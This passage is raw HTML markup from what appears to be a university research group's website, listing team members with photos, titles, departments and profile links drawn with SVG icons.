14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n            <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-Portrait-1-e1697202215204.jpeg\" class=\"wp-image-1701 style-978-image style-local-182-c11-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n            <div data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c17-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c18\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c22-outer\">\n            <div data-colibri-id=\"182-c22\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c23\" class=\"d-block style-982 style-local-182-c23 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\" class=\"wp-image-1704 style-982-image style-local-182-c23-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-982-frameImage style-local-182-c23-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c24\" class=\"h-global-transition-all h-heading style-974 style-local-182-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c24\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Susie Ramisetty-Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c25\" class=\"h-text h-text-component style-975 style-local-182-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Research Associate Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c26\" class=\"h-text h-text-component style-976 style-local-182-c26 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Population Health Sciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c27\" class=\"style-983 style-local-182-c27 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/susie-ramisetty-mikler-7a0b3014/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 